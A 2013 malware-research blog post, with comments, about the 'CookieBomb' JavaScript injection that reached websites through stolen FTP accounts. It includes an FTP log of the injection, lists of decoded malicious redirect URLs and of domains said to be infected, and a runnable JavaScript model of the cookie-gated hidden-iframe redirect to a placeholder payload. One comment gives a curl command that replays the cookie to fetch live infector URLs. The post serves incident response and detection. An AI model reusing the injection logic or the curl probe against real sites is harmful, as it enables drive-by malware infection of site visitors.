Wednesday, July 17, 2013

Proof of Concept of "CookieBomb" code injection attack

This writing is related to the previously blogged "A mystery of Malware URL "cnt.php" Redirection" here-->>[MMD-Blog], so be warned: this is not new stuff. It seems difficult, though, to get some admins to act quickly on the IR of this incident, so my fellow coder friend in our group and I tried to explain, in PoC detail, how dangerous this threat can be.

Coincidentally, I had just handled a rush of malicious JavaScript code injections in similar cases (without involving .htaccess). The evil code was injected into HTML files, mostly index files, with the code as per below:

This is why I have a large number of samples of this injection code for this research.

So I collected the latest 30+ codes, which I attached in the Samples section for cross-analysis by fellow researchers (I use a different password for this sharing purpose; DM me on Twitter for it):

In all cases I handled, these codes were injected into the index files via an FTP account that was leaked or stolen, suspected to come from a malware infection or from FTP brute forcing, or possibly via "other" vulnerabilities (which I cannot say out loud yet; a different issue). The log below (thanks to the great admin who shared it) suggests the same auto-injection FTP tool as previously blogged:

[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="SYST" B=- S=215
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="LIST /" D= B=211 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/" D= B=630 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/data/" D= B=124 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="LIST public_html/images/" D= B=1219 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-
Webroot wrote good articles about these evil tools, which were spotted in use in the wild -->>[HERE] and [HERE]
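As an added example (not code from the post), the following Node.js script turns the signature visible in the log above into a check: the same random-named .gif STORed into several directories (the writable-directory probes, answered with status 552 here), then an index file RETRed and STORed straight back. It assumes the log layout shown above and embeds a constructed, shortened copy of it plus one benign session for contrast; your FTP server's log format may differ, so adjust the line regex before pointing it at real logs.

```javascript
'use strict';
// Added example, not part of the original post: a detector for the FTP
// auto-injection signature that the log above shows. It groups log lines into
// sessions (account + client address) and flags a session when it both
// (a) STORs one randomly named file into several directories, the writable
// directory probes, and (b) RETRs an index file and then STORs it back, the
// injector's read-modify-write. The line layout follows the log quoted above.

// Constructed sample: a shortened copy of the log quoted in the post (masked
// exactly as the post masks it) plus one benign session added for contrast.
const SAMPLE_LOG = `
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/07/11 21:46:59] xxxxxxxx ATTACKER-IP: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/07/11 21:47:00] xxxxxxxx ATTACKER-IP: C="STOR public_html/index.html-1" F=- B=- S=- T=-
[2013/07/11 22:10:03] webmaster 203.0.113.5: C="USER webmaster" B=- S=331
[2013/07/11 22:10:04] webmaster 203.0.113.5: C="STOR public_html/images/logo.png" F=/public_html/images/logo.png B=5120 S=226 T=0.120
`;

// [time] account client: C="CMD arg" ...  -> { time, user, client, cmd, arg }
const LINE_RE = /^\[([^\]]+)\]\s+(\S+)\s+(\S+):\s+C="([A-Z]+)(?:\s+([^"]*))?"/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  return m ? { time: m[1], user: m[2], client: m[3], cmd: m[4], arg: m[5] || '' } : null;
}

const normalize = p => p.replace(/\/+/g, '/');
const basename = p => normalize(p).split('/').filter(Boolean).pop() || '';
// index.html, index.php, plus the index.html-1 style variants seen in the log
const isIndexFile = p => /^index\.(html?|php|asp)(-\d+)?$/i.test(basename(p));

function findInjectionSessions(logText, minProbeDirs = 2) {
  const sessions = new Map();
  for (const raw of logText.split('\n')) {
    const e = parseLine(raw);
    if (!e) continue;
    const key = `${e.user}@${e.client}`;
    if (!sessions.has(key)) sessions.set(key, []);
    sessions.get(key).push(e);
  }
  const findings = [];
  for (const [session, events] of sessions) {
    // (a) the same file name uploaded into several directories
    const dirsByName = new Map();
    for (const e of events) {
      if (e.cmd !== 'STOR') continue;
      const name = basename(e.arg);
      const dir = normalize(e.arg).slice(0, -name.length);
      if (!dirsByName.has(name)) dirsByName.set(name, new Set());
      dirsByName.get(name).add(dir);
    }
    const probeFiles = [...dirsByName].filter(([, d]) => d.size >= minProbeDirs).map(([n]) => n);
    // (b) an index file downloaded and then uploaded again in the same session
    const retrieved = new Set();
    const rewrittenIndexFiles = [];
    for (const e of events) {
      if (!isIndexFile(e.arg)) continue;
      const p = normalize(e.arg);
      if (e.cmd === 'RETR') retrieved.add(p);
      else if (e.cmd === 'STOR' && retrieved.has(p)) rewrittenIndexFiles.push(p);
    }
    if (probeFiles.length && rewrittenIndexFiles.length) {
      findings.push({ session, probeFiles, rewrittenIndexFiles });
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findInjectionSessions(SAMPLE_LOG), null, 2));
}
```

Run it over a whole log by reading the file into `findInjectionSessions`; the session key is account plus client address, which is also what you want to pivot on when you block the attacker's network and reset the abused account's password.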

Let's go back to those injected codes. After decoding, all of these scripts came up with the code below; I put some explanation on the code so that we share the same perception for the further explanation:

The decoded values of the redirection stored in the RANDOM_2_TO_4_CHARS variables are as below
(in "masked" URLs):

xp.src =    'h00p://valtechnologie.com/support/clik.php';
rr.src =    'h00p://toerkoopweb.nl/diensten/count.php';
p.src =     'h00p://abra-pc.com.br/clik.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
c.src =     'h00p://101.110.149.203/clk.php';
y.src =     'h00p://dv-suedpfalz.de/count.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
fkhd.src =  'h00p://syasinya-san.sakura.ne.jp/dtd.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
sfv.src =   'h00p://igrejabatista.comze.com/web_media/counter.php';
idqni.src = 'h00p://www.alle-vier.de/clicker.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
vaasr.src = 'h00p://www.thehornybanana.com/_vti_bin/clicker.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
gvb.src =   'h00p://turbolinks.orgfree.com/documentation/cnt.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
dxbq.src =  'h00p://f2f365.com/counter.php';
qbvmf.src = 'h00p://taekwondoarirang.com/clik.php';
beb.src =   'h00p://avceldiamante.com/clk.php';
wenr.src =  'h00p://ueno-hiroshima.main.jp/dtd.php';
kmqai.src = 'h00p://96.9.52.103/clik.php';
kk.src =    'h00p://spendmetest.com/Services/count.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
nj.src =    'h00p://coleychurch.org.uk/www/cnt.php';
ve.src =    'h00p://alldesign-jp.fool.jp/counter.php';
ydypy.src = 'h00p://igrejabatista.comze.com/web_media/counter.php';
jpp.src =   'h00p://xeropointventures.com/images/rel.php';
udv.src =   'h00p://ueno-hiroshima.main.jp/dtd.php';
So we have the evil PHP file names used as the landing of this redirection: cnt.php, clk.php, clik.php, rel.php, dtd.php, counter.php, clicker.php, and so on. The purpose of this naming is to camouflage the malicious action from the hacked site owners and from the infected victims. The problem is that if you access such a URL directly, it replies with "OK" or some other dull value.

So far, while pointing out and cleaning these infections, even though I begged site admins and owners for the injected code at the landing page, I was not lucky enough to get those scripts. However, we finally understand this malicious concept.

The concept of Cookie Bomb

I called and tagged this the #CookieBomb concept. It works like this:

The code in the template above means: when a cookie-enabled browser accesses one of these infected sites, the code is executed in the JavaScript environment to check whether your browser already has a specific cookie and value; if not, that cookie is created for you. At the same time, whether you have the cookie or not, you are redirected to the other site via a hidden IFRAME, which replies with a dull response like the picture below:

During creation of the cookie, specific values are set: 1) the cookie's name, 2) a special variable value, 3) the expiry date, and 4) the access path. These are the four important values needed for the further process.

After the redirection is made, the PHP (or Java, etc.) script, masked as cnt.php, clk.php, clik.php, rel.php, dtd.php, counter.php, clicker.php and so on, is "supposed" to check the cookie's values and other conditions, and then execute an "action" when those conditions are met; this "action" is never good. It can be another redirection or a straight infection, depending on the needs of the hacker. It is a simple scheme, it works, and it is deployable in a mass automation scheme.

The point of the bad guys doing this is to delay an infection and to avoid detection and alerts. In other words: this time you need a cookie, within some expiry time, as a "ticket" for an infection; that is why I call this a Cookie Bomb.

Proof Of Concept

Well, talk is easy; proving it is another matter. We tried to make a PoC of the above infection concept, and it works with the simple PHP code below:

Explanation:
The above PoC code is just an example. If a landing page reads the cookie and finds the same condition as the cookie value previously set by the injected code on the hacked site, then the malware infection or another attack can be performed. In the example I wrote a direct access to an executable malware file; many implementations of this concept can be applied.
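The two halves described in the concept and the PoC sections above, written as an added example in JavaScript. This is not the PHP PoC from the post (which is shown only as an image); everything here is my own model. The cookie name, value, one-day expiry and both URLs are placeholders, the landing side is a function rather than a PHP script, and, following the post's model, the landing gate is assumed to see the cookie that the injected code set:

```javascript
'use strict';
// Added example, not the PoC code from the post: a Node-runnable model of
// both halves of the CookieBomb flow, the injected client-side template and
// the landing-side gate, plus a browser-like cookie jar so the expiry can be
// exercised. Every concrete value below (cookie name and value, TTL, URLs)
// is a placeholder for this example, not an indicator taken from samples.

const COOKIE_NAME = 'visited_x';              // assumed: 1) cookie name
const COOKIE_VALUE = '1';                     // assumed: 2) the "special value"
const COOKIE_TTL_MS = 24 * 60 * 60 * 1000;    // assumed: 3) expiry, one day
const COOKIE_PATH = '/';                      // 4) path, "/" as the post describes
const LANDING_URL = 'http://landing.example.invalid/cnt.php';  // placeholder
const PAYLOAD_URL = 'http://payload.example.invalid/a.exe';    // placeholder

// "a=1; b=2" -> { a: '1', b: '2' }
function parseCookieHeader(header) {
  const out = {};
  for (const part of (header || '').split(';')) {
    const i = part.indexOf('=');
    if (i > 0) out[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return out;
}

// The injected template: set the cookie when it is missing (document.cookie
// in a real browser) and, either way, add a hidden iframe to the landing
// script. Returned as plain data so the logic runs without a DOM.
function injectedScript(cookieHeader, nowMs) {
  const have = parseCookieHeader(cookieHeader)[COOKIE_NAME] === COOKIE_VALUE;
  const expires = new Date(nowMs + COOKIE_TTL_MS).toUTCString();
  return {
    setCookie: have ? null
      : `${COOKIE_NAME}=${COOKIE_VALUE}; expires=${expires}; path=${COOKIE_PATH}`,
    iframe: { src: LANDING_URL, width: 1, height: 1, style: 'visibility:hidden' },
  };
}

// The landing gate (the cnt.php / clk.php role): no ticket, dull "OK";
// valid ticket, the real action, here a redirect to a payload URL.
function landingGate(cookieHeader) {
  const c = parseCookieHeader(cookieHeader);
  if (c[COOKIE_NAME] !== COOKIE_VALUE) return { status: 200, body: 'OK' };
  return { status: 302, location: PAYLOAD_URL, body: '' };
}

// Minimal browser cookie jar that honours expires= and drops stale cookies.
class CookieJar {
  constructor() { this.cookies = new Map(); }
  store(setCookie) {
    const [nv, ...attrs] = setCookie.split(';').map(s => s.trim());
    let expiresMs = Infinity;
    for (const a of attrs) {
      const i = a.indexOf('=');
      if (i > 0 && a.slice(0, i).trim().toLowerCase() === 'expires') {
        expiresMs = Date.parse(a.slice(i + 1).trim());
      }
    }
    const eq = nv.indexOf('=');
    this.cookies.set(nv.slice(0, eq), { value: nv.slice(eq + 1), expiresMs });
  }
  header(nowMs) {
    return [...this.cookies].filter(([, c]) => c.expiresMs > nowMs)
      .map(([n, c]) => `${n}=${c.value}`).join('; ');
  }
}

// Timeline: a researcher fetching the landing URL directly, a victim whose
// browser ran the injected script, and the same victim after the ticket
// expired. Following the post's model, the landing script sees the cookie.
function simulate() {
  const t0 = Date.UTC(2013, 6, 17, 12, 0, 0);
  const jar = new CookieJar();
  const direct = landingGate('');                    // no ticket
  const page = injectedScript(jar.header(t0), t0);   // victim loads infected page
  if (page.setCookie) jar.store(page.setCookie);
  const armed = landingGate(jar.header(t0 + 1000));  // hidden iframe request
  const expired = landingGate(jar.header(t0 + COOKIE_TTL_MS + 1000));
  return { direct, iframeSrc: page.iframe.src, armed, expired };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(simulate(), null, 2));
}
```

What to take from it: the landing URL answers "OK" to anyone without the ticket, which is exactly why fetching cnt.php directly tells you nothing, and the action is handed out only while the cookie is alive, so a scanner that does not carry the cookie, or carries a stale one, only ever sees the dull reply.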

Mitigation

To mitigate this infection, we can search Google for the keywords below (which can be changed easily by the hackers, so please be flexible in your greps by using regex):

Or scan your web site for it from a local server. If you find it, please decode it to find the destination URL target too, for both sites need to be cleaned from our beloved internet.
Furthermore, to fight this threat the FTP log is really our friend, for we need to know from which IP address the attack came; in my case it mostly came from Ukrainian networks.

How to search this infection?

By understanding the characteristics of this attack, it is not that difficult to search for infected pages. Google Search or Mr. Keith Makan's GooDork are very good tools for this purpose. Look at the automation logic used to infect: seeing (1) the cookie path value of "/" and (2) the FTP hack log shown above, we know that mostly the top pages (or the files linked from the top pages, such as a framed top/menu or a called script/CSS) are targeted, because these bad actors aim for a wide infection. We can just grep for the infection string used (look at one of the pictures above), aim the dork cannon at your target (ISP or country based Geo-IP), and you will get results almost instantly. For example, while writing this I was aiming at the US ISP GoDaddy and received the infected domains below, which are confirmed infected by this attack:

h00p://mmcmt.org/
h00p://www.wettndry.com/
h00p://gorillarobotfactory.com/
h00p://dcprevisores.com/
h00p://ip-72-167-99-107.ip.secureserver.net/
h00p://syccoservices.com/
h00p://cdijescolhacerta.casabmse.pt/
h00p://www.iimspublications.com/
h00p://www.shaversandrazor.com/
h00p://www.newlooklaser.ca/
h00p://www.smartageinsurance.com/
h00p://www.jumpshotmedia.com/
h00p://www.wolfetech.com/
h00p://bracapulco.com/
h00p://www.naturalbalancenow.com/
h00p://www.ishojtv.com/
h00p://www.sensorsadvance.com/
h00p://www.newlooklaser.ca/
h00p://bracapulco.com/
h00p://mosaicnarrative.com/
h00p://westonflmovers.com/
h00p://www.1stpagemarketingservices.com/
h00p://2528c.com/
h00p://starlighthca.com/
h00p://billymorganart.com/
h00p://flyxilla.com/
h00p://thinkingknowledge.com/
h00p://www.angelavanegas.com/
h00p://sportingdelights.com/
h00p://scholarlythinking.com/
h00p://limeworks.org/blog/wp-includes/js/comment-repl%3D/
[...]
(some of ↑these may lead to the Blackhole Exploit Kit; all are infected with the redirect)

Samples

We share the sample injection codes, the decode and the PoC, to be downloaded from-->>[HERE] for research purposes and to raise the detection ratio of this attack.

Additional

Recent changes in obfuscation (or other changes) of this attack will be posted on this page-->>[Blog]

This post is dedicated to fellow admins and fellow IR officers who have to work non-stop to clean this threat, with special thanks to our crusader for his great help in proving the concept.

#MalwareMustDie!

7 comments:

  1. Good #PoC by our crusader, following the cookie condition to trigger the Bomb via a curl command:
    http://malwar.org/buscando-um-hobby-e-encontrei-blackhole-xpl-kit/

    He used curl command like this:

    $ curl -vv --cookie "visited_uq=55;expires=Tue, 16 Jul 2013 14:40:07 GMT; path=/" --referer hxxp://www.clubalpino.org --user-agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" hxxp://laurendavidstyle.com/print/cnt.php

    It works to get infectors:

    hxxp://changeboxcommunications.com/a24fd24d17281a4b9f7e45df07098970/a.php

    Nice PoC! Salute, ☩Crusader!

    1. Latest CookieBomb filenames and masks:

      // filename:

      clicker.php
      esd.php
      relay.php
      cnt.php
      counter.php
      clk.php
      dtd.php
      rel.php
      dot.php
      34.php
      box.php
      net.php
      php5.php
      sys.php
      systems.php
      test.php
      phpinfo.php
      mail.php
      system.php

      // filemask:

      *.html
      *.php
      *.asp
      .htaccess

  2. Great PoC. Here are some real life examples using this technique:
    cookie based web malware analysis

  3. I have this crap on my website and wonder if there is some easy way to detect where it's hidden? The only panic solution I did was to delete all JavaScripts, but the damn thing keeps crawling back. My site is unreal-mayhem.com

    1. did you try a grep -r "e=eval" "$PATHTOALLFILES"

  4. Can anyone please help me out in getting the password for the zip file of the 30+ sample attack pattern text files?

    1. ping me on Twitter > @malwaremustdie, and I will DM it.
